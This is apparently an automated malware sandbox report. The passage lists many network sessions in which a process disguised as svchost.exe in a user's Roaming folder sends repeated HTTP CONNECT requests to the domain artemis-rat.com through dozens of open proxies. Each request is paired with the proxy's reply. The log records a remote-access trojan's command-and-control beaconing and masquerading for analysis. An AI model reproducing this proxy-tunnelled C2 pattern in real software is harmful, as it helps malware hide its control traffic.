                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1849192.168.2.55550362.171.169.375840243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.830910921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.504956007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1850192.168.2.555436103.49.202.2508043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.832490921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1851192.168.2.55564534.49.208.2218043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.832775116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1852192.168.2.555657172.67.181.328043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.833797932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:27.988305092 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1853192.168.2.555426206.189.145.234961443220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.844893932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.551817894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1854192.168.2.555444119.3.215.41888843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.845253944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1855192.168.2.55558794.131.63.1205837843220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.845338106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1856192.168.2.555655104.25.167.888043220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.848512888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.003122091 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1857192.168.2.555680104.19.85.2148043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.865519047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.019921064 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:27 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1858192.168.2.55551445.138.87.238108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.865519047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1859192.168.2.55556518.134.236.231312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.874474049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.164439917 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1860192.168.2.55557095.164.89.123888843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.886445045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1861192.168.2.555694162.214.225.2234980643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.892256021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.364319086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.911248922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.146023989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.333688974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.537034035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.833682060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1862192.168.2.555594198.105.111.15669343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.894572020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.200402975 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1863192.168.2.555578195.90.216.75108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.897962093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1864192.168.2.55559546.17.63.166909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.898772955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.192699909 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1865192.168.2.55561935.79.120.242312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.899460077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.165369034 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1866192.168.2.55566835.237.210.215312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.902885914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.081445932 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1867192.168.2.555551111.90.150.109108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.906992912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1868192.168.2.555605150.230.96.1501929143220C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.912712097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1869192.168.2.55555438.54.16.978043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.913583994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.258666992 CET176INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Length: 19
                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                    Data Ascii: 404 page not found


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1870192.168.2.555663162.223.94.1668043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.915077925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.335546017 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:30 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1871192.168.2.55556262.171.131.1013744743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.916858912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.614322901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.646317005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.646336079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.646486044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1872192.168.2.55571543.153.22.291000543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.918652058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.094573975 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:28.094727993 CET160INHTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl
                                                                                    Data Raw:
                                                                                    Data Ascii:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1873192.168.2.55559134.95.243.122808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:27.919280052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.234164953 CET741INHTTP/1.1 500 Internal Server Error
                                                                                    Server: nginx/1.22.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:28 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 579
                                                                                    Connection: close
